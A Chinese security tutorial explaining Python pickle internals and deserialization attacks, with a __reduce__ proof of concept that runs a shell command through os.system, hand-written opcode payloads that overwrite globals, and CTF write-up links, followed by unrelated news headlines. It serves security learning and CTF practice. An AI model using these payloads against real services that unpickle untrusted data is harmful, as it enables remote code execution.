【技术分享】Python反序列化-手写opcode|opcode|python|反序列化|堆栈|字符串|调用

01写在开篇

模块 pickle 实现了对一个 Python 对象结构的二进制序列化和反序列化。"pickling" 是将 Python 对象及其所拥有的层次结构转化为一个字节流的过程，而 "unpickling" 是相反的操作，会将（来自一个 binary file 或者 bytes-like object 的）字节流转化回一个对象层次结构。pickling（和 unpickling）也被称为“序列化”, “编组” 或者 “平面化”。而为了避免混乱，此处采用术语 “封存 (pickling)” 和 “解封 (unpickling)”。

* pickle.dumps(object)：用于序列化一个对象。

* pickle.loads(picklestring)：用于反序列化数据，实现一个对象的构建。

过程展现：

1. 如果直接定义类 dairy，其中的data text文件将不会被序列化。

2. 需要设定init才可以把以下属性序列化进去。

3. 反序列化如下显示。

4. 序列化数组亦可，如下显示。

5. pickle不仅可以序列化字符串，也可以读写文件，使用pickle.dump()和pickle.load() 即可。

小结：

（一）序列化过程

* 从对象中提取所有属性（__dict__），并将属性转为键值对

* 写入对象的类名

* 写入键值对

（二）反序列化过程

* 获取 pickle 输入流

* 重建属性列表

* 根据保存的类名创建一个新的对象

* 将属性复制到新的对象中

02__reduce__()

__reduce__()类似于PHP中的__wakeup__魔法函数。如果当__reduce__返回值为一个元组(2到5个参数)，第一个参数是可调用(callable)的对象，第二个是该对象所需的参数元组。在这种情况下，反序列化时会自动执行__reduce__里面的操作。

1. 测试代码。

2.运行结果。

3.弹计算机。

03pickle简介

pickle 是一种栈语言，有不同的编写方式，是基于一个轻量的 PVM（Pickle Virtual Machine）。

（一）PVM 的组成部分。

·指令处理器

从流中读取 opcode 和参数，并对其进行解释处理。重复这个动作，直到遇“.”这个结束符后停止。最终留在栈顶的值将被作为反序列化对象返回。

·stack

由 Python 的 list 实现，被用来临时存储数据、参数以及对象。

·memo

由 Python 的 dict 实现，为 PVM 的整个生命周期提供存储。

备注：注意 stack、memo 的实现方式，方便理解接下来的指令。

当前用于 pickling 的协议共有 5 种。使用的协议版本越高，读取生成的 pickle 所需的 Python 版本就要越新。

* v0 版协议是原始的 “人类可读” 协议，并且向后兼容早期版本的 Python。

* v1 版协议是较早的二进制格式，它也与早期版本的 Python 兼容。

* v2 版协议是在 Python 2.3 中引入的。它为存储 new-style class 提供了更高效的机制。欲了解有关第 2 版协议带来的改进，请参阅 PEP 307。

* v3 版协议添加于 Python 3.0。它具有对 bytes 对象的显式支持，且无法被 Python 2.x 打开。这是目前默认使用的协议，也是在要求与其他 Python 3 版本兼容时的推荐协议。

* v4 版协议添加于 Python 3.4。它支持存储非常大的对象，能存储更多种类的对象，还包括一些针对数据格式的优化。有关第 4 版协议带来改进的信息，请参阅 PEP 3154。

（二）指令集。

（三）汇总：

1. c：读取新的一行作为模块名module，读取下一行作为对象名object，并将module.object压入到堆栈中。

2. (：将一个标记对象插入到堆栈中。为实现目的，该指令会与t搭配使用，以产生一个元组。

3. t：从堆栈中弹出对象，直到一个“(”被弹出和创建一个包含弹出对象（除了“(”）的元组对象，并且这些对象的顺序必须与它们压入堆栈时的顺序一致，再将该元组压入到堆栈中。

4. S：读取引号中的字符串直到换行符处，并将它压入堆栈。

5. R：将一个元组和一个可调用对象弹出堆栈，以该元组作为参数可调用的对象，并将结果压入到堆栈中。

6. .：结束pickle。

7. 动态图解释：

参考：https://www.cnblogs.com/value-code/p/9224820.html

8. opmode版本如下显示。

9. pickle3版本的opcode示例。

03pickletools 工具使用

pickletools.optimize目的就是为了去除声明q ，q：储存栈顶的字符串长度为一个字节（即\x00）。

1. 变量覆盖。

/usr/local/var/pyenv/versions/3.7.0/bin/python

/Users/Tkith/Tkitn'sCodeProject/Tkitnpygogogo/aix.py

0: \x80 PROTO3

2: cGLOBAL'builtins exec'

17: qBINPUT0

19: XBINUNICODE "key1=b'1'\nkey2=b'2'"

43: qBINPUT1

45: \x85 TUPLE1 #声明第一个元祖

46: qBINPUT2

48: RREDUCE

49: qBINPUT3

51: .STOP

highest protocol among opcodes = 2

b'1' b'2'

None

Process finished with exit code 0

2. 简单rce。

import pickle

import os

class genpoc(object):

def __reduce__(self):

s = """echo test >poc.txt""" # 要执行的命令

return os.system, (s,) # reduce函数必须

返回元组或字符串

e = genpoc()

poc = pickle.dumps(e)

print(poc) # 此时，如果 pickle.loads(poc)，就会执行命令。

3. 手写opcode

·在CTF中，很多时候需要一次执行多个函数或一次操作多个指令，此时就不能只用__reduce__ 来解决问题。因为reduce一次只能执行一个函数，当exec被禁用时，就不能一次执行多条指令了，所以需要手动拼接或构造opcode了。手写opcode也是pickle反序列化中较难之处。

·此处可以体会到为何pickle是一种语言，直接编写opcode的灵活性比使用pickle序列化生成的代码更高。只要符合pickle语法，就可以进行变量覆盖、函数执行等操作。

·根据前文不同版本的opcode可以看出，版本0的opcode更便于阅读。所以手动编写时，一般选用版本0的opcode。下文中，所有opcode均为版本0的opcode。

全局变量覆盖

# secret.py

name='TEST3213qkfsmfo'

#main.py

import pickle

import secret

opcode='''c__main__

secret

(S'name'

S'1'

db.'''

print('before:',secret.name)

output=pickle.loads(opcode.encode())

print('output:',output)

print('after:',secret.name)

通过c获取全局变量secret，建立一个字典，并使用b对secret进行属性设置，将会使用到payload。

opcode='''c__main__

secret

(S'name'

S'1'

db.'''

4. 函数执行

与函数执行相关的opcode有三个：R、i、o ，所以我们可以从三个方向进行构造。

练习题：ikun

练习题目：

[watevrCTF-2019]Pickle Store

wp：

https://www.cnblogs.com/20175211lyz/p/12310293.html

wp2：

https://blog.csdn.net/weixin_45669205/article/details/116274988

wp3：不出网

https://xz.aliyun.com/t/7320#toc-1

推荐使用的wp：

https://xz.aliyun.com/t/7320#toc-1

【技术分享】Python反序列化-手写opcode

热搜

热门跟贴

热搜

热门跟贴

相关推荐

大神Karpathy：我给大模型「SQL注入」攻击，简直不要太轻松

曝江苏一公园将长条椅焊上钢管 市民：防止干日结的在这睡

编程高薪神话末日来临？23届计算机本科就业率狂掉3.2%，AI技能成救命稻草

不靠更复杂的策略,仅凭和大模型训练对齐,零样本零经验单LLM调用

249 亿公里远程“刷机”成功，“旅行者 1 号”恢复和地面通信

商务部：原则上不予许可镓、锗等两用物项对美国出口

在阿里，痛苦的人开始信教

100万贱卖，曾坐拥2.4亿用户的“互联网全球500强”，被时代抛弃？

女子带俩娃坐缆车 半空遇到野鸡撞进来

“安全智能”的背后，Ilya 究竟看到了什么？

徐杰助广东绝杀山西 吉伦沃特46分古德温空砍44+11

广东一村禁止外来车辆进入，镇政府：很多村都这样的

2024素质教育行业发展趋势报告发布 小码王引领少儿编程进入刚需时代

俩车在武汉街头“顶牛”互不相让 吃瓜男子：我笑死了

几行乱码让大模型获得科学思维，这个神奇的提示词突然火了

私家车和武装押运车狭路相逢 女司机和对方争执

半小时教你手搓AI视频通话，还有懒人版代码已开源

河南漯河建高铁发现古墓群 已发掘战国到东汉古墓200多座

年轻人抛弃搜索引擎

吴恩达开源Python包，统一11家顶尖大模型平台接口

曝江苏一公园将长条椅焊上钢管市民：防止干日结的在这睡

女子带俩娃坐缆车半空遇到野鸡撞进来

徐杰助广东绝杀山西吉伦沃特46分古德温空砍44+11

2024素质教育行业发展趋势报告发布小码王引领少儿编程进入刚需时代

俩车在武汉街头“顶牛”互不相让吃瓜男子：我笑死了

私家车和武装押运车狭路相逢女司机和对方争执

河南漯河建高铁发现古墓群已发掘战国到东汉古墓200多座